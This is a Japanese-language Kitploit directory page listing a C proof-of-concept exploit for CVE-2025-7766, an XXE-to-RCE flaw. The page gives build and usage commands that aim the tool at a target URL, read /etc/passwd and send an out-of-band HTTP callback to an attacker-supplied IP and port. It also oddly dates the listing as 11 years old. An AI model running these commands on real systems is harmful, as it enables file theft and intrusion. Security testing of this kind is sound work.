Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-7766 — CVE-2025-7766向けのCベースのPoCエクスプロイトで、ファイル読み取りと帯域外HTTPコールバックを介したXXE-to-RCEを実証します。カスタムXMLペイロードとリクエストの繰り返しをサポートします。 | Kitploit
ツール/GitHubGitHub/bytereaper77/cve-2025-7766
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストペイロード開発Archived
GitHubbytereaper77/cve-2025-7766

CVE-2025-7766

CVE-2025-7766向けのCベースのPoCエクスプロイトで、ファイル読み取りと帯域外HTTPコールバックを介したXXE-to-RCEを実証します。カスタムXMLペイロードとリクエストの繰り返しをサポートします。

リポジトリを見る
11年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-7766 PoCエクスプロイト

CVE-2025-7766のXML外部エンティティ脆弱性を悪用するPoC。ファイル読み取り(/etc/passwd)およびOut-of-Band HTTPコールバックを実演します。

作者: Byte Reaper

CVE: CVE-2025-7766

脆弱性: XML外部エンティティ(XXE)によるリモートコード実行


CVE-2025-7766におけるXXE悪用のPoC。実演内容:

  • ターゲットから/etc/passwdを読み取る。
  • 自身のサーバーへのOut-of-Band HTTPリクエストをトリガーする。

必要条件

  • gcc
  • libcurl
  • argparseライブラリ

ビルド

root@kitploit:~
gcc -o exploit exploit.c argparse.c -lcurl

使い方

root@kitploit:~
# ファイル読み取りペイロード
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT

# Out-of-Bandリクエストペイロード
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r

# カスタムペイロード
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -b '<YOUR_CUSTOM_XML>'

# リクエストを5回繰り返す
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -r -l 5

# 詳細出力
./exploit -u http://target/xml -i YOUR_IP -p YOUR_PORT -v

ライセンス:

MIT

ツールをダウンロード